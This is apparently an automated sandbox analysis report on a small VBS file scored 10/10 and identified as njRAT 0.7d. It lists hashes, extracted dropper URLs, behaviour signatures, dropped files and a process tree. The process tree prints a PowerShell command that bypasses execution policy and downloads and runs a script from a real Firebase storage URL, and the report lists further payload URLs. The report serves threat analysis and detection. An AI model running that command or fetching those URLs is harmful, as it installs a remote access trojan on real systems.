Overview

overview

10

Static

static

1

c07598299d...f1.vbs

windows7-x64

10

c07598299d...f1.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    146s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240419-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-05-2024 13:34

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    c07598299d2d73883f23a3585740bca427eb733579c4a0fe2280593d116896f1.vbs

  • Size

    271B

  • MD5

    b9acaac18eee9b5cde0c6defbe2c1caa

  • SHA1

    6f8cb34d61f9136e96345684846edf49dfa976bc

  • SHA256

    c07598299d2d73883f23a3585740bca427eb733579c4a0fe2280593d116896f1

  • SHA512

    70c8b3742c98e1daf2c7fda40c992621c2250a9dac648c4798370697f5688e1883162079909dd245a33fc064a843a94f84c7399b99bae9b6418a47b3c5e75e12

Score
10/10
njrathexecutiontrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://firebasestorage.googleapis.com/v0/b/prog-622b7.appspot.com/o/SidM.jpg?alt=media&token=53ed6ff5-09e0-4464-a19c-f0e9d9c6cec8

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://firebasestorage.googleapis.com/v0/b/prog-622b7.appspot.com/o/Ssid.jpg?alt=media&token=10629c63-3c23-437a-9543-4f9dcee695bb
ps1.dropper

https://firebasestorage.googleapis.com/v0/b/prog-622b7.appspot.com/o/Rnew.jpg?alt=media&token=d68ad7e3-80ed-4083-ad53-8af401c5b503

Extracted

Family

njrat

Version

0.7d

Botnet

H

Attributes
  • splitter

    |'|'|

Signatures

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

    trojannjrat
  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 33 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c07598299d2d73883f23a3585740bca427eb733579c4a0fe2280593d116896f1.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4992
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass iex ((New-Object Net.WebClient).DownloadString('https://firebasestorage.googleapis.com/v0/b/prog-622b7.appspot.com/o/SidM.jpg?alt=media&token=53ed6ff5-09e0-4464-a19c-f0e9d9c6cec8'))
      2⤵
      • Blocklisted process makes network request
      • Drops startup file
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4244
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Public\sCs.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:1464
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Public\sCs.ps1
          4⤵
          • Blocklisted process makes network request
          • Suspicious use of SetThreadContext
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3272
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
            "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"
            5⤵
              PID:1680
            • C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
              "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"
              5⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:4328

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      3KB

      MD5

      556084f2c6d459c116a69d6fedcc4105

      SHA1

      633e89b9a1e77942d822d14de6708430a3944dbc

      SHA256

      88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

      SHA512

      0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      6c25e98074e3843e30eeda41a1357b92

      SHA1

      88aacfbe76ce89e2024d652a9ac37ad68518e3fe

      SHA256

      17fa8418f7132c304749f477f7b514c3d6358a7d63b5c3f8529055862dfcd67f

      SHA512

      03f82a7f8834e2a914a3486291d9b3cc97642ad8de55035bfc3a172dfe6ea1de2de2a14c974adf1ed32324f7414088f647ce683f0278881c2339d4551efb0e4c

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ioro4gom.or0.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit
    • C:\Users\Public\sCs.ps1
      Filesize

      1KB

      MD5

      e0e7ea9409eb39ae9d9e06ea8d2acd94

      SHA1

      3b8ab9de2c853a0238f3024eb8905ab81b8f634c

      SHA256

      93b29bea09147a94220823e19c53a36c10ac8689bd196d73ae93e56c6acf3713

      SHA512

      14cb12ce1637b7f2749179330328e6aa20871e6e5783f9e0d709ed2051241f0e4ee645c7d4629146c09c75f28470d4232b13aacc4193007c7b1d8644b25bd48f

      Download Submit
    • C:\Users\Public\sCs.vbs
      Filesize

      166B

      MD5

      c3e1b2c797679d84c76dcdd5bb81db0d

      SHA1

      f178c6888aa88ef7e940dd1b572ea9ac8c30c56c

      SHA256

      cc9f01e9c6a3d717e775740b64106245324ecc9c77004f6c9b5d7d2e84cdf80b

      SHA512

      be52acfd7294f31f7ee1c573711c915705f044cb762a6d5b6051f39f9774e7ef52287cfba5361e921ead9ca952e2c34f3a4210a4d8aa6badee78b1e7b713e22c

      Download Submit
    • memory/3272-34-0x0000025FA2AD0000-0x0000025FA2ADC000-memory.dmp
      Filesize

      48KB

      Download
    • memory/4244-0-0x00007FFDAAEC3000-0x00007FFDAAEC5000-memory.dmp
      Filesize

      8KB

      Download
    • memory/4244-1-0x000001C764FF0000-0x000001C765012000-memory.dmp
      Filesize

      136KB

      Download
    • memory/4244-11-0x00007FFDAAEC0000-0x00007FFDAB981000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/4244-12-0x00007FFDAAEC0000-0x00007FFDAB981000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/4244-21-0x00007FFDAAEC0000-0x00007FFDAB981000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/4328-35-0x0000000000400000-0x0000000000414000-memory.dmp
      Filesize

      80KB

      Download